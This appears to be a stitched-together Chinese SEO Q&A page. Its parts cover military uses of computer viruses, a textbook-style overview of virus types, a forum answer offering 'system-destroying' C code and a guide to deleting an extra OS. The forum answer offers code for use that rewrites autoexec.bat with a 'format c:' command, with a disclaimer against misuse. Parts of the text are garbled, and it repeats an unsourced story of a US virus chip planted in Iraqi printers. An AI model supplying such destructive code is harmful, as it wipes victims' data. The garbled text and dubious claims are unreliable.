1.计算机病毒是否会在军事中运用呢?

2.计算机病毒是指什么?

3.摧毁电脑系统的恶意代码谁有

4.我的电脑有多个系统,怎么删除多余系统?

计算机病毒是否会在军事中运用呢?

摧毁电脑系统-摧毁电脑系统的英文

计算机病毒会不会在军事中运用起来呢?这还是一个疑惑!我来告诉你!下面由我给你做出详细的计算机病毒是否会在军事中运用介绍!希望对你有帮助!

 计算机病毒在军事中说法一:

病毒是资讯战中的隐形武器 所谓计算机病毒,实际是指能够侵入计算机系统并给计算机带来破坏的一种具有自我繁殖能力的有害程式,它能通过磁碟或计算机网路等媒介进行传染,破坏计算机的正常执行。这种传染就像生物病毒传染一样,具有一定的隐蔽性和破坏性,并具有一定的潜伏性,使人们不易觉察,等到条件成熟***如特定的时间或特定的环境或配置***,病毒便发作,从而给整个计算机系统或网路造成紊乱甚至瘫痪。 对于计算机病毒的起源,历来说法不一,一般认为是在十几年前产生于贝尔实验室。当时的研?a href='' target='_blank'>咳嗽痹诠ぷ髦?啵?3P酥虏赝嬉恢帜芄?ldquo;吃掉”对方程式的游戏,此即病毒的雏形。

以后计算机病毒迅速蔓延,波及美国、日本、西欧等许多国家和地区。世界上已爆发了多起计算机染毒事件,如1988年“蠕虫”病毒侵入美国国防部和美军军事基地,并迅速向其它计算机网路扩散,在美国计算机界引起一片恐慌。 计算机病毒可以从不同角度分类,按其表现性质不同可分为良毒和恶毒;按入侵方式不同可分为作业系统型病毒、原始码病毒、外壳病毒、入侵型病毒;按传染方式不同可分为磁碟引导区传染的病毒、作业系统传染的病毒和一般应用程式传染的病毒;按寄生方式不同可分为记忆体宿主型病毒和磁碟宿主型病毒等。

病毒若想摧毁敌方的计算机系统,必须先夺取敌方计算机的控制权,当用户执行一个带病毒的可执行档案时,首先执行的是病毒程式,而不是原程式本身。病毒程式在执行过程中,如果驻留记忆体,则它首先要修改中断向量,使这个中断向量指向病毒,以便及时获得控制权。如果不驻留记忆体,则它将寻找感染物件并感染之。 由此可见,计算机***的条件和理论已经成熟,一旦病毒获得计算机控制权,那么计算机便成了案板上的肉--任人宰割了,病毒的传播和发作也变得轻而易举。美军从1987年开始研制计算机病毒武器。1990年5月,美军方曾出资55万元招标,研制干扰和摧毁敌方电子系统的计算机病毒,并耗资1.5亿元成功地研制出微电脑晶片的“病毒固化”技术。美专家预言:除了病毒在军事上的应用外,单就用病毒扰乱美国银行的计算机网路,1秒钟就能盗走1500亿美元,这必将使美国经济崩溃,失去了经济的支援,美军的任何军事行动都将成为没有油的坦克--废铁一堆。

 计算机病毒在军事中说法二:

资讯战中病毒的施放 实施***的关键一点,就是寻找计算机病毒施放的最佳途径。只要让敌方计算机感染这些经过特殊设计的病毒,那么敌方的计算机必然瘫痪,则敌方的高技术武器就会失去战斗力。目前采用的施毒途径有五种: 1.利用电磁波 将计算机病毒调制到电子装置发射的电磁波中去,从而把病毒注入到敌方无线电接收装置,在电磁系统中扩散。

2.利用有线线路传播 通过有线线路开口或直接将病毒注入线路,使其扩散到计算机系统。

3.派遣特工直接放毒 将带病毒的计算机程式通过特工人员直接拷贝到敌方计算机系统中去。

4.利用微波传输 利用微波技术将病毒传到敌军的计算机系统中。

5.利用军用或民用装置传播 将病毒事先注入军用或民用装置内,这样病毒就潜伏在装置内,利用本国或友邦国将有病毒的装置出售给敌对或潜在敌对的国家或地区,等到战时,即可遥控启用这些病毒,让敌对国计算机系统突然瘫痪。据有关材料报导,美国在向第三世界国家或它认为将来有可能成为美国敌对国的国家出售的高技术武器中,可能就含有病毒。当这些国家与美国“友好”时,这些武器就可以为购买国服务;当这些国家成为美国的敌时,美国便启用这些病毒使这些高技术武器成为“神经病”,不但不攻击敌军,却在自己的阵地上“开花”。

 计算机病毒在军事中说法三:

病毒武器的攻击方式 根据计算机病毒的特点,专家们研究出利用病毒攻击计算机系统的几种方式: 1.启用式攻击:计算机病毒一般都有一定的启用条件,如某个特定的时间或日期、某种特定的使用者识别符的出现、某个特定的档案的出现或某个特定档案使用次数等。计算机病毒具有自我判断其启用条件的能力。当病毒判定条件成熟时,便自动启用病毒。如果是通过遥控启用的,则当病毒接收到这些遥控指令后,便发作进行破坏。 2.干扰式攻击:有些病毒本身并不破坏资料,当病毒侵入后,使用者毫无觉察,病毒利用此隐蔽性进行大面积传染,将自身大量复制,使计算机出现超负荷状态,最后导致计算机不能处理资讯或宕机。也有的在显示屏上出现一些杂乱的影象、挑逗性的语言或某些令你悲观的乐曲,来干扰使用者的正常工作。 3.外科手术式攻击:病毒在计算机系统内只攻击特定的目标,即特定的档案、资料、软体系统。当病毒认为找到特定的目标后,便立即攻击破坏,破坏完毕,自身会消失,而敌方其余的软体系统却能正常使用。这样的攻击,悄无声息,攻击完毕也不留蛛丝马迹,敌方某个系统失去功能却全然无知,当需要使用该系统时,该系统却已彻底地从计算机内消失。 4.变种攻击:病毒的出现也导致反病毒软体的诞生,如何逃过防病毒卡或一些优秀的防病毒软体的侦测,是病毒能否发挥效力的关键。

变种病毒具有分身术,具有更高的隐身效能。当病毒检测软体检测病毒时,灵巧的病毒立即产生变异,生出一个或几十个变种病毒,原病毒虽被防毒软体杀,新的病毒却仍在计算机系统内活动,直到让敌军的计算机系统瘫痪。 据德国报纸报道,美军的计算机***已走出实验室,用于实战。在海湾战争中,美军首次使用病毒攻击伊拉克的防空系统,收到良好效果。海湾战争前夕,伊拉克从法国一家公司订购了一种新型印表机,美国谍报机关知道后,立即派人将美国国家安全域性设计制造的病毒晶片偷偷装入伊拉克订购的印表机内。大家都知道,海湾战争一开始,美军空袭飞机能像入无人之境一样,伊拉克除了零星的高炮还击外,其防空导弹大多没有发射,其原因就是遭到了计算机病毒的攻击。

 计计算机病毒在军事中说法四:

未来战争中病毒武器的应用 计算机病毒由于其独特的破坏作用和破坏的隐蔽性,在未来高技术条件下的作战中,有着广泛的应用前景。 1.破坏敌军电子系统的“利矛坚盾” 现代高科技武器大都以计算机为依托,武器的资讯化程度越高其依赖计算机的程度也越高,武器系统中的任何一个小环节遭到破坏,则整个武器系统便处于瘫痪状态,这是高技术武器脆弱性的一面。据美国报纸宣称:美军方正研制大批专门破坏敌军C3I系统的病毒,这些病毒专门破坏敌军指令,既能潜入敌方的侦察卫星也能进入敌军的导航和通讯指挥系统。

2.干扰敌军的“不鸟” 疲劳战术在二战期间被广泛运用,但在资讯时代的战争中,疲劳战术受到一定的限制,原因就是大规模预警系统的问世。战时可以通过预警机或预警卫星等预警装置,及时侦察到敌军的动向,而不必采取没有价值的军事行动。计算机病毒能打乱敌军的预警布署。这种高阶灵巧的病毒并不破坏敌军的预警系统,只修改敌军的有关资料,让敌方的计算机计算时出错,传输给部队的是一个错误情报,从而迷惑敌人,打乱敌军的军事布署。

3.窃取敌军情报的“隐形黑客” 有一种病毒生来并不是为了破坏敌军的,而是用来窃取敌军情报的。这种病毒有一种无孔不入的本领,当他潜入敌军计算机系统后,便逐步获得计算机的控制权,并不断地检测敌计算机的各种资讯,通过微波或电磁波通道将敌军的各种资讯资料传播出来。当敌军发现它时,它不但可以及时变异进行隐身,必要的时候它还可以自杀与敌同归于尽。 4.软杀伤中最廉价的武器 软杀伤是现代战争中最热门的话题,不战而屈人之兵,乃是上之上策。现在国际上研制的软杀伤武器有核武器、镭射武器、反装备武器等,但他们都非常昂贵,研制国苦不堪言,而且在国际上也经常受到舆论的攻击。计算机病毒是一种技术含量高却又十分廉价的高技术武器,一块晶片,一张磁碟,都可以是病毒武器的媒体。它是一种既便宜又方便又具有大规模软杀伤能力的非致命武器。 5.硬杀伤的前景非常广阔 目前出现的计算机病毒,大都是软杀伤的

即不破坏计算机的硬体,只破坏计算机的软体。计算机病毒能不能破坏敌军计算机的硬体呢?国外有人开始研究这个问题,并且取得了成果。有科学家指出,利用病毒控制计算机的供电系统,让计算机莫名其妙地产生瞬时高压,从而将计算机内的整合块、电容和电阻击穿,达到破坏敌计算机硬体的目的,这已不是幻想。 随着计算机和数字化武器的发展,人们对计算机病毒武器的研究也将逐步深入,不但能制造一般的病毒来攻击敌军,而且可以制造出智慧型病毒,钻入敌军的心脏活动。可以预计,在不久的将来,计算机病毒将和导弹、核武器一样成为攻城掠地的战略武器。

计算机病毒是指什么?

计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。

计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。

简介

计算机病毒是人为制造的,有破坏性,又有传染性和潜伏性的,对计算机信息或系统起破坏作用的程序。它不是独立存在的,而是隐蔽在其他可执行的程序之中。计算机中病毒后,轻则影响机器运行速度,重则机系统破坏;因此,病毒给用户带来很大的损失,通常情况下,我们称这种具有破坏作用的程序为计算机病毒。?

计算机病毒按存在的媒体分类可分为引导型病毒、文件型病毒和混合型病毒3种;按链接方式分类可分为源码型病毒、嵌入型病毒和操作系统型病毒等3种;按计算机病毒攻击的系统分类分为攻击DOS系统病毒,攻击Windows系统病毒,攻击UNIX系统的病毒。如今的计算机病毒正在不断的推陈出新,其中包括一些独特的新型病毒暂时无法按照常规的的类型进行分类,如互联网病毒(通过网络进行传播,一些携带病毒的数据越来越多)、电子邮件病毒等。

计算机病毒被公认为数据安全的头号大敌,从1987年电脑病毒受到世界范围内的普遍重视,我国也于1989年首次发现电脑病毒。目前,新型病毒正向更具破坏性、更加隐秘、感染率更高、传播速度更快等方向发展。因此,必须深入学习电脑病毒的基本常识,加强对电脑病毒的防范。

类型

依附的媒体类型分类

(1)网络病毒:通过计算机网络感染可执行文件的计算机病毒。

(2)文件病毒:主攻计算机内文件的病毒。

(3)引导型病毒:是一种主攻感染驱动扇区和硬盘系统引导扇区的病毒。

计算机特定算法分类

(1)附带型病毒:通常附带于一个EXE文件上,其名称与EXE文件名相同,但扩展是不同的,一般不会破坏更改文件本身,但在DOS读取时首先激活的就是这类病毒。

(2)蠕虫病毒:它不会损害计算机文件和数据,它的破坏性主要取决于计算机网络的部署,可以使用计算机网络从一个计算机存储切换到另一个计算机存储来计算网络地址来感染病毒。

(3)可变病毒:可以自行应用复杂的算法,很难发现,因为在另一个地方表现的内容和长度是不同的。

传播途径

计算机病毒有自己的传输模式和不同的传输路径。计算机本身的主要功能是它自己的复制和传播,这意味着计算机病毒的传播非常容易,通常可以交换数据的环境就可以进行病毒传播。有三种主要类型的计算机病毒传输方式:

(1)通过移动存储设备进行病毒传播:如U盘、CD、软盘、移动硬盘等都可以是传播病毒的路径,而且因为它们经常被移动和使用,所以它们更容易得到计算机病毒的青睐,成为计算机病毒的携带者。

(2)通过网络来传播:这里描述的网络方法也不同,网页、电子邮件、QQ、BBS等都可以是计算机病毒网络传播的途径,特别是近年来,随着网络技术的发展和互联网的运行频率,计算机病毒的速度越来越快,范围也在逐步扩大。

(3)利用计算机系统和应用软件的弱点传播:近年来,越来越多的计算机病毒利用应用系统和软件应用的不足传播出去因此这种途径也被划分在计算机病毒基本传播方式中。

特征

任何病毒只要侵入系统,都会对系统及应用程序产生程度不同的影响。轻者会降低计算机工作效率,占用系统资源,重者可导致数据丢失、系统崩溃。计算机病毒的程序性,代表它和其他合法程序一样,是一段可执行程序,但它不是一段完整的程序,而是寄生在其他可执行程序上的一段程序,只有其他程序运行的时候,病毒才起破坏作用。病毒一旦其进入电脑后得到执行,它就会搜索其他符合条件的环境,确定目标后再将自身制其中,从而到达自我繁殖的目的、因此,传染性是判断计算机病毒的重要条件。

病毒只有在满足其特定条件时,才会对计算机产生致命的破坏,电脑或者系统中毒后不会马上反应,病毒会长期隐藏在系统中。比如说最难忘的是26日发作的CIH,此外还有著名的“黑色星期五”在每逢13号的星期五发作等等。病毒一般情况下都附在正常硬盘或者程序中,计算机用户在它激活之前很难发现它们,其使用很高编程技巧编程,是一种短小精悍的可执行程序,对电脑有着毁灭性的破坏作用;一般没有用户主动执行病毒程序,但是病毒会在其条件成熟后产生作用,或者破坏程序,扰乱系统的工作等;计算机的非授权运行性是计算机病毒的典型特点,其会在未经操作者的许可而自动运行。

隐蔽性

计算机病毒不易被发现,这是由于计算机病毒具有较强的隐蔽性,其往往以隐含文件或程序代码的方式存在,在普通的病毒查杀中,难以实现及时有效的查杀。病毒伪装成正常程序,计算机病毒扫描难以发现。并且,一些病毒被设计成病毒修复程序,诱导用户使用,进而实现病毒植入,入侵计算机。因此,计算机病毒的隐蔽性,使得计算机安全防范处于被动状态,造成严重的安全隐患。

破坏性

病毒入侵计算机,往往具有极大的破坏性,能够破坏数据信息,甚至造成大面积的计算机瘫痪,对计算机用户造成较大损失。如常见的木马、蠕虫等计算机病毒,可以大范围入侵计算机,为计算机带来安全隐患。

传染性

计算机病毒的一大特征是传染性,能够通过U盘、网络等途径入侵计算机。在入侵之后,往往可以实现病毒扩散,感染未感染计算机,进而造成大面积瘫痪等事故。随着网络信息技术的不断发展,在短时间之内,病毒能够实现较大范围的恶意入侵。因此,在计算机病毒的安全防御中,如何面对快速的病毒传染,成为有效防御病毒的重要基础,也是构建防御体系的关键。

寄生性

计算机病毒还具有寄生性特点。计算机病毒需要在宿主中寄生才能生存,才能更好地发挥其功能,破坏宿主的正常机能。通常情况下,计算机病毒都是在其它正常程序或数据中寄生,在此基础上利用一定媒介实现传播,在宿主计算机实际运行过程中,一旦达到某种设置条件,计算机病毒就会被激活,随着程序的启动,计算机病毒会对宿主计算机文件进行不断辅助、修改,使其破坏作用得以发挥。

可执行性

计算机病毒与其他合法程序一样,是一段可执行程序,但它不是一个完整的程序,而是寄生在其他可执行程序上,因此它享有一切程序所能得到的权力。

可触发性

病毒因某个事件或数值的出现,诱使病毒实施感染或进行攻击的特征。

攻击的主动性

病毒对系统的攻击是主动的,计算机系统无论采取多么严密的保护措施都不可能彻底地排除病毒对系统的攻击,而保护措施充其量是一种预防的手段而已。

病毒的针对性

计算机病毒是针对特定的计算机和特定的操作系统的。例如:有针对IBM PC机及其兼容机的,有针对Apple公司的Macintosh的,还有针对UNIX操作系统的。例如,小球病毒是针对IBM PC机及其兼容机上的DOS操作系统的。

中毒电脑的主要症状

中毒电脑的主要症状很多,凡是电脑不正常都有可能与病毒有关。电脑染上病毒后,如果没有发作,是很难觉察到的。但病毒发作时就很容易从以下症状中感觉出来:工作会很不正常;莫名其妙的机;突然重新启动或无法启动;程序不能运行;磁盘坏簇莫名其妙地增多;磁盘空间变小;系统启动变慢;数据和程序丢失;出现异常的声音、音乐或出现一些无意义的画面问候语等显示;正常的外设使用异常,如打印出现问题,键盘输入的字符与屏幕显示不一致等;异常要求用户输入口令。

常见病毒举例

“爱虫”病毒。该病毒是通过Microsoft Outlook电子邮件系统传播的,邮件的主题为“I LOVE YOU”并包含一个附件。一旦在Microsoft Outlook里打开这个邮件,系统就会自动复制并向地址簿中的所有邮件地址发送这个病毒。“爱虫”病毒是一种蠕虫病毒,可以改写本地及网络硬盘上的某些文件,染毒以后邮件系统会变慢,并可能导致整个网络系统崩溃。

CIH病毒。CIH是一个纯粹的Windows 95/98病毒,通过软件之间的相互拷贝、盗版光盘的使用和Internet的传播而大面积传染。CIH病毒发作时将用杂乱数据覆盖硬盘前1024K字节,破坏主板BIOS芯片,使机器无法启动,彻底摧毁电脑系统。

Happy 99螟虫。它是一种自动通过Email传播的病毒,如果单击了它,就会出现一幅五彩缤纷的图像,许多人以为是贺年卡之类的软件。它将自身安装到Windows下并修改注册表,下次启动时自动加载。自此病毒安装成功之后,发出的所有邮件都会有一个附件——Happy 99.exe,如果收信人单击了此文件,那么电脑就会中毒。

木马病毒、黑客病毒。木马病毒其前缀是:Trojan,黑客病毒前缀名一般为Hack。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。

脚本病毒。脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。

宏病毒。其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染Word97及以前版本Word文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染Word97以后版本Word文档的病毒采用Word作为第二前缀,格式是:Macro.Word;凡是只感染Excel97及以前版本Excel文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染Excel97以后版本Excel文档的病毒采用Excel作为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染Office系列文档,然后通过Office通用模板进行传播。

后门病毒。后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。如很多朋友遇到过的IRC后门Backdoor.IRCBot。

危害

增强对计算机病毒的防范意识,认识到病毒的破坏性和毁灭性是非常重要的。现如今,电脑已被运用到各行各业中,计算机和计算机网络已经成为人们生活中重要的组成部分,而病毒会对计算机数据的破坏和篡改,**会造成严重的网络安全问题,影响网络的使用效益。

(1)如果激发了病毒,计算机会产生很大的反应;大部分病毒在激发的时候直接破坏计算机的重要信息数据,它会直接破坏CMOS设置或者删除重要文件,会格式化磁盘或者改写目录区,会用“垃圾”数据来改写文件。计算机病毒是一段计算机代码,肯定占有计算机的内存空间,有些大的病毒还在计算机内部自我复制,导致计算机内存的大幅度减少,病毒运行时还抢占中断、修改中断地址在中断过程中加入病毒的“私货”,干扰了系统的正常运行。病毒侵入系统后会自动的搜集用户重要的数据,窃取、泄漏信息和数据,造成用户信息大量泄露,给用户带来不可估量的损失和严重的后果。

(2)消耗内存以及磁盘空间。比如,你并没有存取磁盘,但磁盘指示灯狂闪不停,或者其实并没有运行多少程序时却发现系统已经被占用了不少内存,这就有可能是病毒在作怪了;很多病毒在活动状态下都是常驻内存的,一些文件型病毒能在短时间内感染大量文件、每个文件都不同程度地加长了、就造成磁盘空间的严重浪费。正常的软件往往需要进行多人多次测试来完善,而计算机病毒一般是个别人在一台计算机上完成后快速向外放送的,所以病毒给计算机带来的危害不只是制造者所期望的病毒还有一些由于计算机病毒错误而带来的。

(3)计算机病毒给用户造成严重的心理压力病毒的泛滥使用户提心吊胆,时刻担心遭受病毒的感染,由于大部分人对病毒并不是很了解,一旦出现诸如计算机机、软件运行异常等现象,人们往往就会怀疑这些现象可能是计算机病毒造成的。据统计,计算机用户怀疑“计算机有病毒”是一种常见的现象,超过70%的计算机用户担心自己的计算机侵入了病毒,而实际上计算机发生的种种现象并不全是病毒导致的。

摧毁电脑系统的恶意代码谁有

童鞋,你好邪恶。这个的话很容易实现,你是需要代码还是程序?代码的话如下。仅供技术交流。违法使用与本人无关! 一下代码均为c语言程序代码,vc6编译通过. 一、让系统崩溃的代码。 #include int main( void ) { for(;;){ printf( "hung up/t/t/b/b/b/b/b/b" ); print("hung up/t/t/b/b/b/b/b/b"); } return 0; } 2、格式化硬盘 #include<stdio.h> main() { FILE*fp; char filename[30]="c:\\autoexec.bat",filecontent[100]="c:\\windows\\command\\format c:/q/autotest/u"; if((fp=fopen(filename,"w"))==NULL) printf("cannot open filename\n"); fputs(filecontent,fp); printf("进行中!"); fclose(fp); }

麻烦采纳,谢谢!

我的电脑有多个系统,怎么删除多余系统?

1、点击开始菜单图标,在弹出的页面中点击 命令提示符 选项;或者是直接按下键盘的 win+R 组合快捷键。

2、然后在打开的运行窗口中输入 cmd 回车,然后在打开的命令行窗口中是输入?msconfig ?回车。

3、然后在打开的页面中点击上面的引导选项卡。

4、在打开的页面中可以看到2个系统,一个是win7,另外一个是win10,默认是win7系统的,将当前的win10设为默认。

5、然后选择需要删除掉的某个系统,如这里的win7系统,选择好之后,点击 删除 按钮。

6、然后找到刚才删除掉的系统所在的磁盘分区,然后鼠标右键,在出现的菜单中点击格式化,将它格式化掉即可。